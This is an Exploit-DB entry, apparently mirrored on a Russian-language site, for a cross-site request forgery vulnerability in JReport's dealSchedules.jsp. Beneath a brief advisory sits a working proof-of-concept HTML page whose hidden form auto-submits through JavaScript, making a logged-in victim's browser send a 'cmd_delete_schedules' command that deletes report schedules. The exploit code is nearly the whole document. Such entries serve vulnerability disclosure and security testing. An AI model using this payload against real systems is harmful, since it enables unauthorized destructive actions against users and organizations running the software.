- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38816
- Проверка EDB
-
- Пройдено
- Автор
- POONAM SINGH
- Тип уязвимости
- WEBAPPS
- Платформа
- JSP
- CVE
- null
- Дата публикации
- 2013-10-25
JReport - 'dealSchedules.jsp' Cross-Site Request Forgery
HTML:
source: https://www.securityfocus.com/bid/63363/info
JReport is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
<html>
<body>
<form name="foo" action="https://www.example.com/jreport/jinfonet/dealSchedules.jsp"method="post">
<input type=hidden name="d1" value="2013-08-03%252014%253a20%253a41.29">
<input type=hidden name="cmd" value="cmd_delete_schedules">
<input type=hidden name="taskClass" value="APIDemoDynamicExportTask">
<input type=hidden name="taskUrl" value="schedulePage.jsp%3Fjrs.cmd%3Djrs.get_edit_schd_page%26jrs.task_id%3D2013-08-03%252014%253a20%253a41.29%26jrs.catalog%3D%252fSecurity%252fSecurity.cat%26jrs.report%3D%252fSecurity%252fBank_User%2520Activation.cls%26jrs.path%3D%2FUSERFOLDERPATH%2Fadmin">
<input type=hidden name="jrs.path" value="%2FUSERFOLDERPATH%2Fadmin">
</form>
<script>
document.foo.submit();
</script>
</body>
</html>
- Источник
- www.exploit-db.com